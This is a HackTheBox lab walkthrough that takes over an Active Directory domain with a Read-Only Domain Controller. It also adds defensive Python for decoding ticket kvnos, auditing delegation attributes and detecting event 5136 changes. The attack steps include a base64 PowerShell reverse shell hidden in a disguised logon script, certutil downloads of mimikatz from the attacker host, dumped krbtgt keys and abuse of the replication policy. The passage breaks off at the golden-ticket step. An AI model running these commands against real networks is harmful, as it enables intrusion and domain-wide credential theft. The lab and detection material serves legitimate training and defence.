HackTheBox - Garfield

Updated 10-04-2026

A Windows Active Directory environment built around a Read-Only Domain Controller — abusing writable AD attributes and a carefully constructed Kerberos delegation chain leads from a low-privileged domain user to Domain Admin.

Recon

Nmap

$ ip=10.129.23.25; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-05 13:47 -0400
Nmap scan report for 10.129.23.25
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GARFIELD
| NetBIOS_Domain_Name: GARFIELD
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: garfield.htb
| DNS_Computer_Name: DC01.garfield.htb
| DNS_Tree_Name: garfield.htb
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-06T01:47:05+00:00
|_ssl-date: 2026-04-06T01:47:45+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.garfield.htb
| Not valid before: 2026-02-13T01:10:36
|_Not valid after: 2026-08-15T01:10:36
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m01s
| smb2-time:
| date: 2026-04-06T01:47:05
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.15 seconds

The scan confirms a Domain Controller for garfield.htb (DC01.garfield.htb). Notable findings:

  • 2179/tcp — VM RDP, suggesting a guest VM (likely RODC01) on an internal network
  • 5985/tcp — WinRM available
  • 8-hour clock skew — Kerberos operations will require time synchronisation
  • SMB signing is required on DC01

Foothold

Hosts File

$ echo '10.129.23.25 garfield.htb dc01.garfield.htb' | sudo tee -a /etc/hosts

SMB Share Enumeration

We start with credentials j.arbuckle:Th1sD4mnC4t!@1978:

$ crackmapexec smb 10.129.23.25 -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --shares
SMB 10.129.23.25 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:garfield.htb) (signing:True) (SMBv1:False)
SMB 10.129.23.25 445 DC01 [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978
SMB 10.129.23.25 445 DC01 [+] Enumerated shares
SMB 10.129.23.25 445 DC01 Share Permissions Remark
SMB 10.129.23.25 445 DC01 ----- ----------- ------
SMB 10.129.23.25 445 DC01 ADMIN$ Remote Admin
SMB 10.129.23.25 445 DC01 C$ Default share
SMB 10.129.23.25 445 DC01 IPC$ READ Remote IPC
SMB 10.129.23.25 445 DC01 NETLOGON READ Logon server share
SMB 10.129.23.25 445 DC01 SYSVOL READ Logon server share

Domain User Enumeration

$ ldapsearch -x -H ldap://10.129.23.25 -D "j.arbuckle@garfield.htb" -w 'Th1sD4mnC4t!@1978' -b "dc=garfield,dc=htb" "(objectClass=user)" sAMAccountName   
# extended LDIF
#
# LDAPv3
# base <dc=garfield,dc=htb> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName

# Administrator, Users, garfield.htb
dn: CN=Administrator,CN=Users,DC=garfield,DC=htb
sAMAccountName: Administrator

# Guest, Users, garfield.htb
dn: CN=Guest,CN=Users,DC=garfield,DC=htb
sAMAccountName: Guest

# DC01, Domain Controllers, garfield.htb
dn: CN=DC01,OU=Domain Controllers,DC=garfield,DC=htb
sAMAccountName: DC01$

# krbtgt, Users, garfield.htb
dn: CN=krbtgt,CN=Users,DC=garfield,DC=htb
sAMAccountName: krbtgt

# RODC01, Domain Controllers, garfield.htb
dn: CN=RODC01,OU=Domain Controllers,DC=garfield,DC=htb
sAMAccountName: RODC01$

# krbtgt_8245, Users, garfield.htb
dn: CN=krbtgt_8245,CN=Users,DC=garfield,DC=htb
sAMAccountName: krbtgt_8245

# Jon Arbuckle, Users, garfield.htb
dn: CN=Jon Arbuckle,CN=Users,DC=garfield,DC=htb
sAMAccountName: j.arbuckle

# Liz Wilson, Users, garfield.htb
dn: CN=Liz Wilson,CN=Users,DC=garfield,DC=htb
sAMAccountName: l.wilson

# Liz Wilson ADM, Users, garfield.htb
dn: CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb
sAMAccountName: l.wilson_adm

# search result
search: 2
result: 0 Success

# numResponses: 13
# numEntries: 9
# numReferences: 3

The presence of krbtgt_8245 and RODC01$ tells us there is a Read-Only Domain Controller in the environment. The RODC has its own krbtgt account (krbtgt_8245) whose keys, if obtained, can be used to forge tickets valid against RODC01.
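The link between the account name krbtgt_8245 and the tickets RODC01 issues is the key version number: Windows KDCs pack the RODC's branch id into the upper 16 bits of the kvno and the real key version into the lower 16 bits ([MS-KILE]), and the branch id is the number in the krbtgt_<N> name. The following Python is an added example, not part of this writeup, that decodes a kvno and maps it back to the krbtgt account whose key must have signed the ticket; the account list it filters is constructed from the ldapsearch output above. A reviewer looking at a captured or forged TGT can use this to tell an RODC-signed ticket from one signed by the writable DC.

```python
"""Decode the kvno stamped into Active Directory tickets to identify the
signing krbtgt account (krbtgt for a writable DC, krbtgt_<branch> for an RODC).

Added example, not part of the original writeup.  Per [MS-KILE], the upper
16 bits of a 32-bit kvno carry the RODC branch id (0 for a writable DC) and
the lower 16 bits carry the key version; the branch id matches the suffix
of the RODC's krbtgt account name (krbtgt_8245 -> branch 8245).
"""

import re
from dataclasses import dataclass
from typing import Dict, Iterable, Optional

RODC_SHIFT = 16
LOW16 = 0xFFFF

_KRBTGT_RE = re.compile(r"^krbtgt_(\d+)$", re.IGNORECASE)


@dataclass(frozen=True)
class KvnoInfo:
    issued_by_rodc: bool
    branch_id: Optional[int]   # None when signed by a writable DC
    key_version: int


def decode_kvno(kvno: int) -> KvnoInfo:
    """Split a 32-bit kvno into (RODC branch id, key version)."""
    if not 0 <= kvno <= 0xFFFFFFFF:
        raise ValueError("kvno must be an unsigned 32-bit integer")
    branch = kvno >> RODC_SHIFT
    version = kvno & LOW16
    if branch == 0:
        return KvnoInfo(False, None, version)
    return KvnoInfo(True, branch, version)


def encode_kvno(key_version: int, branch_id: int = 0) -> int:
    """Inverse of decode_kvno; branch_id 0 means a writable DC."""
    if not 0 <= key_version <= LOW16 or not 0 <= branch_id <= LOW16:
        raise ValueError("key_version and branch_id must fit in 16 bits")
    return (branch_id << RODC_SHIFT) | key_version


def rodc_branch_from_account(sam_account_name: str) -> Optional[int]:
    """Map an RODC krbtgt account name (krbtgt_8245) to its branch id."""
    m = _KRBTGT_RE.match(sam_account_name)
    return int(m.group(1)) if m else None


def expected_krbtgt_account(kvno: int) -> str:
    """Name of the krbtgt account whose key signed a ticket with this kvno."""
    info = decode_kvno(kvno)
    return f"krbtgt_{info.branch_id}" if info.issued_by_rodc else "krbtgt"


def rodc_krbtgt_accounts(sam_account_names: Iterable[str]) -> Dict[str, int]:
    """Filter an account listing (e.g. from ldapsearch) down to RODC krbtgt accounts."""
    found = {}
    for name in sam_account_names:
        branch = rodc_branch_from_account(name)
        if branch is not None:
            found[name] = branch
    return found


if __name__ == "__main__":
    # Constructed sample: the accounts visible in the ldapsearch output above.
    accounts = ["Administrator", "Guest", "DC01$", "krbtgt", "RODC01$",
                "krbtgt_8245", "j.arbuckle", "l.wilson", "l.wilson_adm"]
    print(rodc_krbtgt_accounts(accounts))
    rodc_kvno = encode_kvno(2, branch_id=8245)
    print(hex(rodc_kvno), decode_kvno(rodc_kvno))
    print(expected_krbtgt_account(rodc_kvno), expected_krbtgt_account(2))
```

A ticket whose kvno decodes to branch 8245 was signed with krbtgt_8245's key; a writable DC should only see such tickets in the RODC-to-RWDC referral and KeyList flows, which is what makes the kvno a useful pivot when reviewing Kerberos traffic involving an RODC.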

SYSVOL Enumeration

Download the full SYSVOL share recursively:

$ smbclient //garfield.htb/SYSVOL -U j.arbuckle%'Th1sD4mnC4t!@1978'   
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

GptTmpl.inf at garfield.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit reveals that l.wilson has the SeBatchLogonRight privilege — meaning she can log on as a batch job, which is consistent with logon script execution.

BloodHound Enumeration

Running bloodhound-python directly fails with a Kerberos clock skew error:

$ bloodhound-python -u j.arbuckle -p 'Th1sD4mnC4t!@1978' -d garfield.htb --domain-controller DC01.garfield.htb --nameserver 10.129.23.25 -c All   
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: garfield.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

ntpdate to sync the clock also fails — it appears to be blocked by the target. Use faketime to spoof the correct time for the command without modifying the system clock:

$ faketime "$(ntpdate -q 10.129.23.25 | cut -d ' ' -f 1,2)" bloodhound-python -u j.arbuckle -p 'Th1sD4mnC4t!@1978' -d garfield.htb --domain-controller DC01.garfield.htb --nameserver 10.129.23.25 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: garfield.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC01.garfield.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Found 8 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: RODC01.garfield.htb
INFO: Querying computer: DC01.garfield.htb
INFO: Done in 00M 37S

Upload the JSON files to BloodHound:

$ ls -la             
-rw-rw-r-- 1 kali kali 7491 Apr 5 14:24 20260405222400_computers.json
-rw-rw-r-- 1 kali kali 24787 Apr 5 14:24 20260405222400_containers.json
-rw-rw-r-- 1 kali kali 3092 Apr 5 14:24 20260405222400_domains.json
-rw-rw-r-- 1 kali kali 3966 Apr 5 14:24 20260405222400_gpos.json
-rw-rw-r-- 1 kali kali 84112 Apr 5 14:24 20260405222400_groups.json
-rw-rw-r-- 1 kali kali 2005 Apr 5 14:24 20260405222400_ous.json
-rw-rw-r-- 1 kali kali 18501 Apr 5 14:24 20260405222400_users.json
$ bloodhound

Navigate to http://127.0.0.1:8080/ui/ and import the JSON files. BloodHound reveals the following attack path:

  • j.arbuckle has write access to scriptPath on multiple accounts
  • l.wilson has ForceChangePassword on l.wilson_adm
  • l.wilson_adm is a member of TIER 1 which has AddSelf on RODC ADMINISTRATORS
  • l.wilson_adm has ForceChangePassword and WriteAccountRestrictions on RODC01$
  • RODC01$ can ForceChangePassword on krbtgt_8245

bloodyAD confirms we have write access to scriptPath on several accounts including l.wilson:

$ bloodyAD --host 10.129.23.25 -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' get writable --detail

distinguishedName: CN=Guest,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=krbtgt_8245,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=Jon Arbuckle,CN=Users,DC=garfield,DC=htb
<--SNIP-->
scriptPath: WRITE
<--SNIP-->

distinguishedName: CN=Liz Wilson,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

Logon Script Abuse — Reverse Shell as l.wilson

The scriptPath attribute on a user object specifies a batch script that runs automatically when the user logs in. Since we can write to SYSVOL and set scriptPath on l.wilson, we can plant a malicious script that fires a reverse shell the next time she authenticates.

Generate the PowerShell reverse shell payload as a Base64-encoded command:

$ echo '$client = New-Object System.Net.Sockets.TCPClient("10.10.16.27",4444);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback=(iex $data 2>&1|Out-String);
$sendback2=$sendback+"PS "+(pwd).Path+"> ";
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()' | iconv -t UTF-16LE | base64 -w0

Build printerDetect.bat with the encoded payload:

cat > printerDetect.bat << 'EOF'
@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Enc 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
EOF

Upload printerDetect.bat to the SYSVOL scripts folder:

$ smbclient //garfield.htb/SYSVOL -U j.arbuckle%'Th1sD4mnC4t!@1978'
smb: \> cd garfield.htb\scripts
smb: \garfield.htb\scripts\> put printerDetect.bat

Set l.wilson's scriptPath to point to the malicious script:

$ bloodyAD --host garfield.htb -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' set object "l.wilson" scriptPath -v printerDetect.bat

Start a listener and wait for l.wilson to log in:

$ nc -lnvp 4444

After a short wait, the shell arrives. Now use l.wilson's session to reset l.wilson_adm's password — BloodHound confirmed she has ForceChangePassword over this account:

PS C:\Users\l.wilson\Documents> $NewPassword = ConvertTo-SecureString "Password123" -AsPlainText -Force
PS C:\Users\l.wilson\Documents> Set-ADAccountPassword -Identity l.wilson_adm -NewPassword $NewPassword -Reset

Log in as l.wilson_adm via WinRM and collect the user flag:

$ evil-winrm -i garfield.htb -u l.wilson_adm -p Password123
*Evil-WinRM* PS C:\Users\l.wilson_adm> cd ../Desktop
*Evil-WinRM* PS C:\Users\l.wilson_adm\Desktop> type user.txt

Privilege Escalation

BloodHound already mapped the full path to SYSTEM on the DC. The steps are:

  1. Add l.wilson_adm to RODC ADMINISTRATORS to gain admin access to RODC01.
  2. Set up RBCD on RODC01$ to get a service ticket as Administrator.
  3. Tunnel into the internal network to reach RODC01 (192.168.100.2).
  4. Use Mimikatz on RODC01 to extract the krbtgt_8245 AES256 key.
  5. Manipulate the RODC Password Replication Policy to allow Administrator's password to replicate.
  6. Forge a golden ticket signed with krbtgt_8245 and redeem it against DC01.

Add l.wilson_adm to RODC ADMINISTRATORS

*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> Add-ADGroupMember -Identity "RODC ADMINISTRATORS" -Members "l.wilson_adm"

RBCD on RODC01$ for SYSTEM Access

Resolve RODC01's internal IP:

*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> nslookup RODC01.garfield.htb
Server: localhost
Address: 127.0.0.1

Name: RODC01.garfield.htb
Address: 192.168.100.2

Create a fake machine account and configure RBCD — this grants FAKEPC$ the right to impersonate any user on RODC01$ via S4U2Proxy:

$ impacket-addcomputer garfield.htb/l.wilson_adm:'Password123' -computer-name 'FAKEPC$' -computer-pass 'Password123!' -dc-ip garfield.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account FAKEPC$ with password Password123!.
$ impacket-rbcd garfield.htb/l.wilson_adm:'Password123' -delegate-from 'FAKEPC$' -delegate-to 'RODC01$' -action write -dc-ip garfield.htb 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FAKEPC$ can now impersonate users on RODC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] FAKEPC$ (S-1-5-21-2502726253-3859040611-225969357-10601)
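The attribute impacket-rbcd writes here, msDS-AllowedToActOnBehalfOfOtherIdentity, holds a binary self-relative security descriptor; the trustees of its allow ACEs are the accounts permitted to act on behalf of other identities against RODC01$. The Python below is an added example, not code from the writeup or from Impacket: it walks such a descriptor and returns the trustee SIDs, so a defender can periodically read the attribute from every domain controller and tier-0 host and diff it against an approved list (an empty attribute is the expected state). The descriptor it parses is constructed in build_rbcd_sd() to contain the FAKEPC$ SID from the output above; that builder exists only to produce test input and makes no claim about how Windows lays out owner and group fields.

```python
"""Audit msDS-AllowedToActOnBehalfOfOtherIdentity (resource-based constrained
delegation).  The attribute is a self-relative security descriptor whose DACL
allow-ACEs name the principals that may delegate to this object.

Added example, not part of the original writeup or of Impacket.  The sample
descriptor is constructed by build_rbcd_sd(); real values read from LDAP
carry owner/group fields too, which this parser skips over via the offsets.
"""

import struct
from typing import Iterable, List, Set

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
SD_HEADER_LEN = 20          # revision, sbz1, control, 4 offsets


def sid_to_string(data: bytes, offset: int):
    """Decode a binary SID at offset; return (string SID, bytes consumed)."""
    revision, sub_count = data[offset], data[offset + 1]
    if revision != 1 or sub_count > 15:
        raise ValueError("malformed SID")
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from(f"<{sub_count}I", data, offset + 8)
    text = f"S-1-{authority}" + "".join(f"-{s}" for s in subs)
    return text, 8 + 4 * sub_count


def rbcd_trustees(sd: bytes) -> List[str]:
    """Return the SIDs of ACCESS_ALLOWED ACEs in the descriptor's DACL."""
    if not sd:
        return []                      # attribute not set: nobody may delegate
    if len(sd) < SD_HEADER_LEN or sd[0] != 1:
        raise ValueError("not a revision-1 security descriptor")
    control = struct.unpack_from("<H", sd, 2)[0]
    off_dacl = struct.unpack_from("<I", sd, 16)[0]
    if not control & SE_SELF_RELATIVE:
        raise ValueError("expected a self-relative descriptor")
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _rev, _sbz1, acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, end = off_dacl + 8, off_dacl + acl_size
    trustees = []
    for _ in range(ace_count):
        if pos + 4 > end:
            raise ValueError("ACE overruns ACL")
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = sid_to_string(sd, pos + 8)   # header(4) + mask(4) + SID
            trustees.append(sid)
        pos += ace_size
    return trustees


def unexpected_delegators(sd: bytes, approved: Set[str]) -> List[str]:
    """Trustees present in the attribute that are not on the approved list."""
    return [s for s in rbcd_trustees(sd) if s not in approved]


# --- constructed test input below; not the shape Windows writes verbatim ---

def string_to_sid(text: str) -> bytes:
    parts = text.split("-")
    if parts[:2] != ["S", "1"]:
        raise ValueError("bad SID string")
    authority, subs = int(parts[2]), [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack(f"<{len(subs)}I", *subs)


def build_rbcd_sd(trustee_sids: Iterable[str]) -> bytes:
    """Minimal self-relative SD with one allow ACE per SID (owner/group omitted)."""
    aces = b""
    count = 0
    for s in trustee_sids:
        sid = string_to_sid(s)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), 0x000F01FF) + sid
        count += 1
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), count, 0) + aces
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, SD_HEADER_LEN)
    return header + acl


if __name__ == "__main__":
    fakepc = "S-1-5-21-2502726253-3859040611-225969357-10601"   # SID from the rbcd output
    sample = build_rbcd_sd([fakepc])
    print(rbcd_trustees(sample))
    print(unexpected_delegators(sample, approved=set()))
```

In production the attribute value comes from an LDAP read of the computer object (e.g. every member of OU=Domain Controllers); any trustee not on the approved list, or any non-empty value on a host that should have none, is the finding.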

Request the service ticket. The first attempt fails on clock skew:

$ impacket-getST garfield.htb/'FakePC$':'Password123!' -spn cifs/RODC01.garfield.htb -impersonate Administrator -dc-ip garfield.htb

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Sync the clock and retry:

$ sudo ntpdate -s 10.129.25.166 

$ impacket-getST garfield.htb/'FakePC$':'Password123!' -spn cifs/RODC01.garfield.htb -impersonate Administrator -dc-ip garfield.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache

Chisel Tunnel to RODC01

RODC01 is on the internal 192.168.100.0/24 subnet and is not directly reachable from the attack machine. Set up a Chisel SOCKS5 tunnel through DC01.

Serve and download chisel.exe on the target:

$ python3 -m http.server 80
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> certutil -urlcache -split -f http://10.10.16.27/chisel.exe

Start the Chisel server on the attack machine:

$ chisel server --reverse -p 9999

Connect from the target:

*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> .\chisel.exe client 10.10.16.27:9999 R:socks

Connect to RODC01 and Extract krbtgt_8245 Keys

Export the ticket and use psexec through the tunnel to connect to RODC01:

$ export KRB5CCNAME=Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache
$ proxychains impacket-psexec garfield.htb/Administrator@RODC01.garfield.htb -k -no-pass -dc-ip garfield.htb -target-ip 192.168.100.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 ... OK
[*] Requesting shares on 192.168.100.2.....
[*] Found writable share ADMIN$
[*] Uploading file nFlSEZjf.exe
[*] Opening SVCManager on 192.168.100.2.....
[*] Creating service Cwhx on 192.168.100.2.....
[*] Starting service Cwhx.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 ... OK
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.8511]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Download Mimikatz to RODC01 and extract the krbtgt_8245 keys:

C:\Windows\system32> cd C:\Windows\Temp

C:\Windows\Temp> certutil -urlcache -split -f http://10.10.16.27/mimikatz.exe
**** Online ****
000000 ...
131308
CertUtil: -URLCache command completed successfully.
C:\Windows\Temp> .\mimikatz.exe

privilege::debug
mimikatz # Privilege '20' OK

lsadump::lsa /inject /name:krbtgt_8245
mimikatz # Domain : GARFIELD / S-1-5-21-2502726253-3859040611-225969357

RID : 00000643 (1603)
User : krbtgt_8245

* Primary
NTLM : 445aa4221e751da37a10241d962780e2
LM :
Hash NTLM: 445aa4221e751da37a10241d962780e2

* Kerberos-Newer-Keys
Default Salt : GARFIELD.HTBkrbtgt_8245
Default Iterations : 4096
Credentials
aes256_hmac (4096) : d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
aes128_hmac (4096) : 124c0fd09f5fa4efca8d9f1da91369e5
des_cbc_md5 (4096) : d540fe6192b9ecfe

* NTLM-Strong-NTOWF
Random Value : f4b51c2c0d006172304e31dbc6e0de6b

Mimikatz gives us the AES256 key, the NTLM hash, and the domain SID — the three ingredients needed to forge a ticket as any user in the domain using krbtgt_8245.

Manipulate RODC Password Replication Policy

We can’t modify the Allowed RODC Password Replication Group directly, but the Password Replication Policy is also controlled by two attributes on the RODC computer object: msDS-RevealOnDemandGroup (allow list) and msDS-NeverRevealGroup (deny list). As an RODC administrator, l.wilson_adm has write access to these attributes.

Clear the deny list first, then add Administrator to the allow list:

$ bloodyAD -u l.wilson_adm -p 'Password123' -d garfield.htb --host garfield.htb set object 'RODC01$' msDS-NeverRevealGroup
$ bloodyAD -u l.wilson_adm -p 'Password123' -d garfield.htb --host garfield.htb set object 'RODC01$' msDS-RevealOnDemandGroup -v 'CN=Administrator,CN=Users,DC=garfield,DC=htb'
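Every directory write in this chain (the scriptPath change in the Logon Script Abuse section, the msDS-AllowedToActOnBehalfOfOtherIdentity write in the RBCD section, and the two Password Replication Policy edits just above) is a single LDAP attribute modification, and with the Directory Service Changes audit subcategory enabled and a SACL on the objects, each one produces Security event 5136 on the DC with the actor, object DN, attribute name, value and operation type. The Python below is an added example, not part of the writeup: it parses 5136 events exported as XML and raises an alert for exactly those attribute/operation pairs, treating a value deleted from msDS-NeverRevealGroup as the most severe case because it weakens the deny list that protects privileged secrets from RODC caching. The events it scans are constructed here to mirror the writeup's modifications (the SDDL value and the benign actor names are made up); real exports use the same Data element names.

```python
"""Detect the attribute changes used in this chain from Security event 5136
("A directory service object was modified").  Needs the Directory Service
Changes audit subcategory plus a SACL on the monitored objects; each value
add/delete is logged with AttributeLDAPDisplayName, AttributeValue and
OperationType (%%14674 = value added, %%14675 = value deleted).

Added example, not from the original writeup.  SAMPLE_EVENTS are constructed
to mirror the scriptPath, RBCD and PRP writes described above.
"""

import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List
from xml.sax.saxutils import escape

VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"

# attribute -> (operation that matters, severity, why it matters)
WATCHED = {
    "scriptPath": (VALUE_ADDED, "high",
                   "logon script set on user; it runs in the user's context at next logon"),
    "msDS-AllowedToActOnBehalfOfOtherIdentity": (VALUE_ADDED, "high",
                   "RBCD configured: named principal may impersonate users to this host"),
    "msDS-NeverRevealGroup": (VALUE_DELETED, "critical",
                   "RODC password replication deny list weakened"),
    "msDS-RevealOnDemandGroup": (VALUE_ADDED, "high",
                   "RODC password replication allow list expanded"),
}


@dataclass
class Alert:
    severity: str
    actor: str
    object_dn: str
    attribute: str
    value: str
    reason: str


def parse_5136(xml_text: str) -> Dict[str, str]:
    """Flatten an event's <Data Name=...> elements, with or without the Event namespace."""
    fields = {}
    for el in ET.fromstring(xml_text).iter():
        if el.tag.split("}")[-1] == "Data" and "Name" in el.attrib:
            fields[el.attrib["Name"]] = (el.text or "").strip()
    return fields


def evaluate(fields: Dict[str, str]) -> List[Alert]:
    """Return an alert if this event is a watched attribute/operation pair."""
    rule = WATCHED.get(fields.get("AttributeLDAPDisplayName", ""))
    if rule is None or fields.get("OperationType") != rule[0]:
        return []
    _, severity, reason = rule
    return [Alert(severity, fields.get("SubjectUserName", "?"), fields.get("ObjectDN", "?"),
                  fields["AttributeLDAPDisplayName"], fields.get("AttributeValue", ""), reason)]


def scan(events: List[str]) -> List[Alert]:
    alerts: List[Alert] = []
    for e in events:
        alerts.extend(evaluate(parse_5136(e)))
    return alerts


def make_event(actor: str, object_dn: str, object_class: str, attr: str, value: str, op: str) -> str:
    """Constructed 5136 event in exported Event XML shape (namespace omitted)."""
    return (f"<Event><System><EventID>5136</EventID><Computer>DC01.garfield.htb</Computer></System>"
            f"<EventData><Data Name='SubjectUserName'>{escape(actor)}</Data>"
            f"<Data Name='SubjectDomainName'>GARFIELD</Data>"
            f"<Data Name='ObjectDN'>{escape(object_dn)}</Data><Data Name='ObjectClass'>{object_class}</Data>"
            f"<Data Name='AttributeLDAPDisplayName'>{attr}</Data><Data Name='AttributeValue'>{escape(value)}</Data>"
            f"<Data Name='OperationType'>{op}</Data></EventData></Event>")


RODC_DN = "CN=RODC01,OU=Domain Controllers,DC=garfield,DC=htb"
SAMPLE_EVENTS = [
    make_event("j.arbuckle", "CN=Liz Wilson,CN=Users,DC=garfield,DC=htb", "user",
               "scriptPath", "printerDetect.bat", VALUE_ADDED),
    make_event("l.wilson_adm", RODC_DN, "computer", "msDS-AllowedToActOnBehalfOfOtherIdentity",
               "O:BAD:(A;;0xf01ff;;;S-1-5-21-2502726253-3859040611-225969357-10601)", VALUE_ADDED),
    make_event("l.wilson_adm", RODC_DN, "computer", "msDS-NeverRevealGroup",
               "CN=Denied RODC Password Replication Group,CN=Users,DC=garfield,DC=htb", VALUE_DELETED),
    make_event("l.wilson_adm", RODC_DN, "computer", "msDS-RevealOnDemandGroup",
               "CN=Administrator,CN=Users,DC=garfield,DC=htb", VALUE_ADDED),
    # constructed benign changes that must not alert
    make_event("helpdesk", "CN=Jon Arbuckle,CN=Users,DC=garfield,DC=htb", "user",
               "description", "Cat owner", VALUE_ADDED),
    make_event("dcadmin", RODC_DN, "computer", "msDS-NeverRevealGroup",
               "CN=Domain Admins,CN=Users,DC=garfield,DC=htb", VALUE_ADDED),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.actor} changed {a.attribute} on {a.object_dn}: {a.value} ({a.reason})")
```

Adding values to msDS-NeverRevealGroup is deliberately not alerted, since that hardens the policy; the asymmetric handling of add versus delete per attribute is what keeps the rule from firing on routine administration.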

Forge the Golden Ticket and Connect to DC01

Download the Rubeus binary (the v4.8.1 build from the GhostPack Compiled Binaries repository) and serve it with Python's HTTP server:

$ python3 -m http.server 80

Back on DC01 as l.wilson_adm, download Rubeus and forge a golden ticket signed with krbtgt_8245's AES256 key:

